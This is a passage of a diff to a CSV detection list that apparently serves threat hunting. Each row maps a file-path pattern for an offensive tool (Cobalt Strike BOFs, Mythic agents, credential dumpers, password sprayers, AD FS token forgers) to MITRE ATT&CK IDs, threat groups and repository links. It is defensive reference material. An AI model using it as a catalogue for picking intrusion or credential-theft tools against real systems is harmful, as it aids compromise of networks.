APT29","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","10","10","964","172","2023-09-22T15:51:55Z","2020-07-15T16:21:18Z" -"*/adcs_request/adcs_request.*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","599","98","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" -"*/adcs_request/CertCli.*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - 
T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","599","98","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" -"*/adcs_request/certenroll.*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","599","98","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" -"*/adcs_request/CertPol.*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - 
T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","599","98","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" -"*/adcs-enum.py*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-03T16:51:44Z","2022-01-24T20:44:38Z" -"*/ADCSKiller*","offensive_tool_keyword","ADCSKiller","ADCSKiller is a Python-based tool designed to automate the process of discovering and exploiting Active Directory Certificate Services (ADCS) vulnerabilities. 
It leverages features of Certipy and Coercer to simplify the process of attacking ADCS infrastructure","T1552.004 - T1003.003 - T1114.002","TA0006 - TA0003 - TA0005","N/A","N/A","Exploitation tools","https://github.com/grimlockx/ADCSKiller","1","1","N/A","N/A","6","535","53","2023-05-19T17:36:37Z","2023-05-19T06:51:41Z" +"*/adconnectdump.git*","offensive_tool_keyword","adconnectdump","Dump Azure AD Connect credentials for Azure AD and Active Directory","T1003.004 - T1059.001 - T1082","TA0006 - TA0002 - TA0007","N/A","N/A","Credential Access","https://github.com/fox-it/adconnectdump","1","1","N/A","10","6","507","84","2023-08-21T00:00:08Z","2019-04-09T07:41:42Z" +"*/adcs.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/adcs_enum/*","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat 
Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","10","10","966","173","2023-09-22T15:51:55Z","2020-07-15T16:21:18Z" +"*/adcs_request/adcs_request.*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*/adcs_request/CertCli.*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 
- T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*/adcs_request/certenroll.*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" 
+"*/adcs_request/CertPol.*","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*/adcs-enum.py*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*/ADCSKiller*","offensive_tool_keyword","ADCSKiller","ADCSKiller is a Python-based tool designed to automate the process of discovering and exploiting Active Directory Certificate Services (ADCS) vulnerabilities. 
It leverages features of Certipy and Coercer to simplify the process of attacking ADCS infrastructure","T1552.004 - T1003.003 - T1114.002","TA0006 - TA0003 - TA0005","N/A","N/A","Exploitation tools","https://github.com/grimlockx/ADCSKiller","1","1","N/A","N/A","6","536","53","2023-05-19T17:36:37Z","2023-05-19T06:51:41Z" "*/ADCSPwn.git*","offensive_tool_keyword","ADCSPwn","A tool to escalate privileges in an active directory network by coercing authenticate from machine accounts and relaying to the certificate service","T1550.002 - T1078.003 - T1110.003","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/bats3c/ADCSPwn","1","1","N/A","10","8","749","119","2023-03-20T20:30:40Z","2021-07-30T15:04:41Z" +"*/add_computer.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" "*/add_groupmember.py*","offensive_tool_keyword","acltoolkit","acltoolkit is an ACL abuse swiss-army knife. It implements multiple ACL abuses","T1222.001 - T1222.002 - T1046","TA0007 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/zblurx/acltoolkit","1","1","N/A","N/A","2","108","14","2023-02-03T10:27:45Z","2022-01-12T22:45:49Z" "*/address-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/AddUser-Bof.*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF that Add an admin user","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/0x3rhy/AddUser-Bof","1","1","N/A","10","10","52","12","2022-10-11T06:51:27Z","2021-08-30T10:09:20Z" "*/AddUser-Bof/*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF that Add an admin user","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - 
T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/0x3rhy/AddUser-Bof","1","1","N/A","10","10","52","12","2022-10-11T06:51:27Z","2021-08-30T10:09:20Z" "*/ADFSpoof.py*","offensive_tool_keyword","ADFSpoof","A python tool to forge AD FS security tokens.","T1600 - T1600.001 - T1552 - T1552.004","TA0006 - TA0001","N/A","N/A","Sniffing & Spoofing","https://github.com/mandiant/ADFSpoof","1","1","N/A","10","4","300","52","2023-09-21T17:14:52Z","2019-03-20T22:30:58Z" -"*/ADFSpray*","offensive_tool_keyword","adfspray","Python3 tool to perform password spraying against Microsoft Online service using various methods","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/xFreed0m/ADFSpray","1","1","N/A","N/A","1","75","14","2023-03-12T00:21:34Z","2020-04-23T08:56:51Z" +"*/ADFSpray*","offensive_tool_keyword","adfspray","Python3 tool to perform password spraying against Microsoft Online service using various methods","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/xFreed0m/ADFSpray","1","1","N/A","N/A","1","76","14","2023-03-12T00:21:34Z","2020-04-23T08:56:51Z" "*/ADHunt.git*","offensive_tool_keyword","adhunt","Tool for exploiting Active Directory Enviroments - enumeration","T1018 - T1087 - T1087.002 - T1069 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","AD 
Enumeration","https://github.com/karendm/ADHunt","1","1","N/A","7","1","41","8","2023-08-10T18:55:39Z","2023-06-20T13:24:10Z" "*/ad-ldap-enum.git*","offensive_tool_keyword","ad-ldap-enum","An LDAP based Active Directory user and group enumeration tool","T1087 - T1087.001 - T1018 - T1069 - T1069.002","TA0007 - TA0003 - TA0004","N/A","N/A","AD Enumeration","https://github.com/CroweCybersecurity/ad-ldap-enum","1","1","N/A","6","3","290","72","2023-02-10T19:07:34Z","2015-08-25T19:38:39Z" "*/adm2sys.py*","offensive_tool_keyword","PyExec","This is a very simple privilege escalation technique from admin to System. This is the same technique PSExec uses.","T1134 - T1055 - T1548.002","TA0004 - TA0005 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/OlivierLaflamme/PyExec","1","1","N/A","9","1","10","6","2019-09-11T13:56:04Z","2019-09-11T13:54:15Z" "*/Admin2Sys.git*","offensive_tool_keyword","Admin2Sys","Admin2Sys it's a C++ malware to escalate privileges from Administrator account to NT AUTORITY SYSTEM","T1055.002 - T1078.003 - T1068","TA0002 - TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/S12cybersecurity/Admin2Sys","1","1","N/A","10","1","31","15","2023-05-01T19:32:41Z","2023-05-01T18:50:51Z" -"*/admin-panels.txt*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5262","1327","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" -"*/ADRecon*","offensive_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner and Earth Lusca Operations Tools and commands","T1087 - T1012 - T1064 - T1210 - T1213 - T1566 - T1071","TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Information Gathering","https://github.com/sense-of-security/ADRecon","1","1","N/A","N/A","10","1514","271","2020-06-15T05:23:14Z","2017-11-29T23:01:53Z" 
-"*/ADSearch.git*","offensive_tool_keyword","adsearch","A tool to help query AD via the LDAP protocol","T1087 - T1069.002 - T1018","TA0003 - TA0002 - TA0007","N/A","N/A","Reconnaissance","https://github.com/tomcarver16/ADSearch","1","1","N/A","N/A","4","370","44","2023-07-07T14:39:50Z","2020-06-17T22:21:41Z" +"*/admin-panels.txt*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"*/ADRecon*","offensive_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner and Earth Lusca Operations Tools and commands","T1087 - T1012 - T1064 - T1210 - T1213 - T1566 - T1071","TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Information Gathering","https://github.com/sense-of-security/ADRecon","1","1","N/A","N/A","10","1515","271","2020-06-15T05:23:14Z","2017-11-29T23:01:53Z" +"*/ADSearch.git*","offensive_tool_keyword","adsearch","A tool to help query AD via the LDAP protocol","T1087 - T1069.002 - T1018","TA0003 - TA0002 - TA0007","N/A","N/A","Reconnaissance","https://github.com/tomcarver16/ADSearch","1","1","N/A","N/A","4","371","44","2023-07-07T14:39:50Z","2020-06-17T22:21:41Z" "*/aerosol.py*","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient","T1110 - T1078 - T1133 - T1061","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","0","N/A","10","10","1352","268","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z" "*/afp-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/afp-ls.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" 
@@ -2618,22 +2621,22 @@ "*/agent/C/src/*","offensive_tool_keyword","Striker","Striker is a simple Command and Control (C2) program.","T1071 - T1071.001 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1105 - T1105.002 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/4g3nt47/Striker","1","1","N/A","10","10","279","43","2023-05-04T18:00:05Z","2022-09-07T10:09:41Z" "*/agent/stagers/dropbox.py*","offensive_tool_keyword","EmbedInHTML","What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.","T1027 - T1566.001","TA0005 - TA0002","N/A","N/A","Phishing","https://github.com/Arno0x/EmbedInHTML","1","1","N/A","10","5","458","144","2017-09-27T13:16:06Z","2017-09-11T07:17:20Z" "*/agent_code/Apollo/*","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","1","N/A","10","10","401","83","2023-08-17T14:46:04Z","2020-11-09T08:05:16Z" -"*/agent_code/Athena*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. 
Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-03T16:51:44Z","2022-01-24T20:44:38Z" +"*/agent_code/Athena*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" "*/agent_code/cmd_executor*","offensive_tool_keyword","mythic","mythic C2 agent","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/freyja/","1","1","N/A","10","10","11","6","2023-06-30T16:35:47Z","2022-09-28T17:20:04Z" -"*/agent_code/dll.go*","offensive_tool_keyword","mythic","Cross-platform post-exploitation HTTP Command & Control agent written in golang","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/merlin","1","1","N/A","10","10","57","10","2023-08-11T15:02:23Z","2021-01-25T12:36:46Z" -"*/agent_code/merlin.*","offensive_tool_keyword","mythic","Cross-platform post-exploitation HTTP Command & Control agent written in golang","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - 
